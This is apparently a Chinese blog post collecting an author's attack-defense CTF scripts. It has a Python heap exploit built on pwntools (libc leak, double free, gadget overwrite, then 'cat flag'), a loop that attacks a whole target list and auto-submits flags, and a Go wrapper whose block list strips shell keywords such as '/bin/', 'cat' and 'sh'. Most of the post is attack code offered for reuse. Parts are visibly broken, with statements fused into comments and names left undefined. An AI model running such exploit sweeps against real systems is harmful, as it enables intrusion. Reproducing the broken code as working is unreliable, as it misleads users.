今天在整理语雀知识库的时候,整理之前参加awd的时候的脚本。

那时候pwn没咋学,总结一下:

(后面如果有机会还会再传)

自动get ip脚本

# Target-list generator for the AWD sweep: writes one "host:port" entry per
# line to url.txt, which the attack loop later reads. The 127.0.<i>.1 pattern
# and port 9999 are placeholders; substitute the real team subnet and port.
filename = 'url.txt'
targets = ["127.0." + str(i) + ".1:9999\n" for i in range(255)]
with open(filename, 'w') as f:
    f.writelines(targets)

自动攻击+提交

pip install requests   # 包名是 requests(带 s),脚本里调用的也是 requests.post

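# Attack function for a single target; adapt it to the challenge binary.
def pwn(host, port):
    """Exploit the note service at host:port and return the raw line read
    back after `cat flag` (whatever the tube returns, newline included).

    Relies on the menu helpers (newpost/edit/delete/show/unsort) and the
    pwntools names (context, remote, ELF, u64, p64, success) from the
    surrounding script.  The two libc constants below (0x3c4b10 and
    283536 == 0x45390) are tied to one specific libc build -- presumably
    glibc 2.23 / Ubuntu 16.04, TODO confirm -- and must be re-derived for
    any other target libc.

    NOTE(review): several lines in this function look like statements of the
    original script fused into comments when the listing was pasted (the
    allocations tagged #0..#3, the p64(0x60208d) allocation, the 0x602018
    payload and delete(p,"6")).  The later delete(p,"0")/delete(p,"1") and
    the edit of index 3 only make sense if those chunks exist, so restore
    them from the original script before relying on this function.
    """
    context(os="linux", arch="amd64", timeout=30)
    # context.log_level = "DEBUG"
    p = remote(host, port)  # was fused into the comment above in the paste

    context.terminal = ['tmux', 'split', '-h']
    elf = ELF("./main")  # loaded for symbol lookups; unused on this path
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # gdb.attach(p,"b *0x400bd0") newpost(p,"AAAAAA")#0 newpost(p,"BBBBBBB")#1 unsort(p,"6666666") #2 newpost(p,"hhhhh") #3 0x6020b8 #pause() delete(p,"2")
    newpost(p, "")

    show(p)
    # Leak: read up to the first 0x7f byte of a libc pointer, rebuild the
    # 8-byte value and subtract the build-specific distance to the libc base.
    libc.address = u64(p.recvuntil("\x7f", timeout=3)[-6:] + '\0\0') - 250 - 0x3c4b10
    success("libc -> {:#x}".format(libc.address))

    # Double free of index 0 with index 1 in between (fastbin-dup shaped;
    # whether the chunks are actually fastbin-sized depends on the binary).
    delete(p, "0")
    delete(p, "1")
    delete(p, "0")
    # pause() newpost(p,p64(0x60208d))
    # pause()
    newpost(p, "/bin/sh\0")
    #pause() newpost(p,"")
    # Offset noted during a debugging session; not used below.
    # ioaddr = 0x7f55aab438e0 - 0x7f55aa77f000
    ####test # newpost(p,"") # pause() ####test newpost(p,'qrstuvwxyz'+"ABCDEFGHIJKLMNOPQ"+p64(0x602018))

    # Edit index 3 with a libc address.  Only 7 of the 8 bytes are sent,
    # presumably so the byte after the slot is left intact.
    p.sendlineafter("Your Choice:", "2")
    p.sendlineafter("Enter the Index:", "3")
    content = p64(libc.address + 283536)[:-1]
    p.sendafter("Enter the Content:", content)

    #edit("4","/bin/sh") #pause() delete(p,"6")
    p.sendline("cat flag")
    flag = p.recvline()
    p.close()  # Important: release the connection before returning.
    return flag  # was fused into the comment on the line above in the paste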
################# Menu helpers: they only drive the service prompts and carry no exploit logic #################
def newpost(p, content):
    """Menu option 1: create a post holding `content`, then consume the
    service's acknowledgement line."""
    for prompt, answer in (("Your Choice:", "1"), ("Enter the Content:", content)):
        p.sendlineafter(prompt, answer)
    p.recvline()

def edit(p, index, content):
    """Menu option 2: overwrite post `index` with `content`."""
    steps = (
        ("Your Choice:", "2"),
        ("Enter the Index:", index),
        ("Enter the Content:", content),
    )
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)

def delete(p, index):
    """Menu option 3: free post `index`."""
    for prompt, answer in (("Your Choice:", "3"), ("Enter the Index:", index)):
        p.sendlineafter(prompt, answer)

def show(p):
    """Menu option 4: make the service print its posts; the caller reads
    the output (this is where the libc leak comes from)."""
    choice = "4"
    p.sendlineafter("Your Choice:", choice)

def unsort(p, content):
    """Menu option 5 with `content`.  The name suggests it produces an
    unsorted-bin sized allocation -- confirm against the binary."""
    for prompt, answer in (("Your Choice:", "5"), ("Enter the Content:", content)):
        p.sendlineafter(prompt, answer)

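# Automatic flag submission.
def submit(flag, token):
    """POST `flag` with the team `token` to the scoring endpoint.

    Returns True when the server's reply does not contain the failure marker
    `failed`, False otherwise.  `failed` (like `token`) is expected to be
    defined by the surrounding script; if it is not, this raises NameError,
    which the caller's broad except will only print -- so define it.
    Network errors propagate as whatever `requests` raises.
    """
    url = "xxxx"  # TODO: replace with the real submission URL
    pos = {
        "flag": flag,
        "token": token
    }

    # Print the flag, not the whole dict: the token is a credential and does
    # not belong in console output or captured logs.
    print("[+] Submiting flag : [%s]" % (flag))
    # Bound the request; a hung submission would stall every remaining target.
    response = requests.post(url, data=pos, timeout=10)  # was data=data (undefined name)
    content = response.text  # text, not bytes, so the `in` test below works on Python 3 too
    print("[+] Content : %s " % (content))
    if failed in content:
        print("[-]failed")
        return False
    print("[+] Success!")
    return True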

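def exploit(host, port):
    """Run pwn() against one target and submit whatever it returns.

    Any exception (connection refused, timeout, a patched binary) is reported
    and swallowed on purpose: one dead box must not stop the sweep over the
    target list.  `token` is a global from the surrounding script.
    """
    try:
        # pwn is the attack function
        flag = pwn(host, port)
        if not flag:
            print("[-] %s:%s returned no flag" % (host, port))
            return
        # submit sends the flag to the scoring server
        submit(flag, token)

    except Exception as m:
        # Name the target so a failure in the loop output can be traced.
        print("[-] %s:%s %s" % (host, port, m))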

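def exploit_it(filename="url.txt"):
    """Attack every "host:port" line in `filename` (default url.txt, the file
    written by the target-list generator), one target after another.

    Blank and malformed lines are reported and skipped rather than raising
    inside the loop, since a single bad line would otherwise abort the sweep.
    """
    with open(filename) as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            # Split host from port
            host, sep, port = line.partition(":")
            if not sep or not port.isdigit():
                print("[-] Skipping malformed target: %s" % line)
                continue
            port = int(port)
            print("[+] Exploiting:%s:%d" % (host, port))
            # Run the attack script
            exploit(host, port)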

pwnwaf-go语言版

package main

import (
"bufio"
"fmt"
"os"
"os/exec"
"regexp"
"strconv"
"sync"
"time"
)

// Pwnwaf sits between the client and the protected binary: it deletes a list
// of shell-related keywords from stdin, blanks flag-shaped text on stdout, and
// writes both raw streams to a log file.
var wg sync.WaitGroup

// Both paths are relative to the working directory the wrapper is started in.

// pwnPath is the binary to protect; change it per challenge.
const pwnPath = "./tmp/nysec"

// logPath is the log directory; it must be writable by the wrapper.
const logPath = "./tmp/pwnone_log/"

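// main runs the protected binary as a child process and proxies its stdin and
// stdout: client input is scrubbed of shell keywords before it reaches the
// child, child output has flag-shaped text blanked before it reaches the
// client, and both raw streams go to a per-run log file.  The wrapper ends as
// soon as either stream finishes, then reaps the child.
func main() {
	fmt.Println("该文件由Pwnwaf进行保护")

	// MkdirAll is a no-op for an existing directory, so no Stat probe is
	// needed.  0700: the log keeps the child's unredacted output, which is
	// exactly where the flag shows up, so other local users must not read it.
	if err := os.MkdirAll(logPath, 0700); err != nil {
		fmt.Fprintln(os.Stderr, "pwnwaf: creating log dir:", err)
		os.Exit(1)
	}
	// Wall-clock time plus the millisecond epoch value: distinct per run in
	// practice.  O_APPEND makes a rare collision append instead of overwriting
	// the earlier log from offset 0.
	now := time.Now()
	logfileName := logPath + now.Format("15_04_05") + "_" + strconv.FormatInt(now.UnixNano()/1e6, 10) + ".log"
	f, err := os.OpenFile(logfileName, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
	if err != nil {
		fmt.Fprintln(os.Stderr, "pwnwaf: opening log file:", err)
		os.Exit(1)
	}
	// bufio.Writer is not safe for concurrent use and both relay goroutines
	// log, so every log write is serialised through logMu.
	var logMu sync.Mutex
	fwriter := bufio.NewWriter(f)
	logEntry := func(tag string, data []byte) {
		logMu.Lock()
		defer logMu.Unlock()
		fwriter.WriteString(tag + ": \n")
		fwriter.Write(data)
		fwriter.WriteString("\n")
	}
	defer func() {
		logMu.Lock()
		fwriter.Flush()
		logMu.Unlock()
		f.Close()
	}()

	pwnCmd := exec.Command(pwnPath)
	pwnIn, err := pwnCmd.StdinPipe()
	if err != nil {
		fmt.Fprintln(os.Stderr, "pwnwaf: stdin pipe:", err)
		return
	}
	pwnOut, err := pwnCmd.StdoutPipe()
	if err != nil {
		fmt.Fprintln(os.Stderr, "pwnwaf: stdout pipe:", err)
		return
	}
	if err = pwnCmd.Start(); err != nil {
		fmt.Fprintln(os.Stderr, "pwnwaf: starting", pwnPath+":", err)
		return
	}

	// The first goroutine to finish ends the wrapper.  sync.Once makes the
	// second finisher harmless; a WaitGroup with Add(1) and two Done() calls
	// can panic on a negative counter when both streams end together.
	done := make(chan struct{})
	var finish sync.Once
	stop := func() { finish.Do(func() { close(done) }) }

	go func() { // child stdout -> client
		defer stop()
		flagExp := regexp.MustCompile("flag\\{.*?}")
		buf := make([]byte, 1024)
		for {
			n, err := pwnOut.Read(buf)
			// Read may return data together with an error; relay it first.
			if n > 0 {
				out := buf[:n]
				logEntry("send", out)
				// Blank anything flag-shaped.  Matching is per Read chunk, so a
				// flag split across two chunks would pass through unredacted.
				if _, werr := os.Stdout.Write(flagExp.ReplaceAll(out, nil)); werr != nil {
					return
				}
			}
			if err != nil {
				return
			}
		}
	}()

	go func() { // client stdin -> child
		defer stop()
		// Crude keyword blacklist: each match is deleted wherever it occurs,
		// so legitimate input containing e.g. "sh" is mangled as well.  The
		// deletion is repeated until nothing changes; a single pass would turn
		// "cacatt" into "cat".  Same per-chunk caveat as on the output side.
		cmdExp := regexp.MustCompile("/bin/|cat|flag|sh|tac|strings|head|tail|base64")
		buf := make([]byte, 1024)
		for {
			n, err := os.Stdin.Read(buf)
			if n > 0 {
				in := buf[:n]
				logEntry("receive", in)
				for {
					scrubbed := cmdExp.ReplaceAll(in, nil)
					if len(scrubbed) == len(in) {
						break
					}
					in = scrubbed
				}
				if _, werr := pwnIn.Write(in); werr != nil {
					return
				}
			}
			if err != nil {
				return
			}
		}
	}()

	<-done
	// Do not leave behind a child that ignores EOF and spins on its menu.
	_ = pwnCmd.Process.Kill() // best effort: the child may already have exited
	_ = pwnCmd.Wait()         // reap it; a signal exit status is expected here
}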
2025-03-15
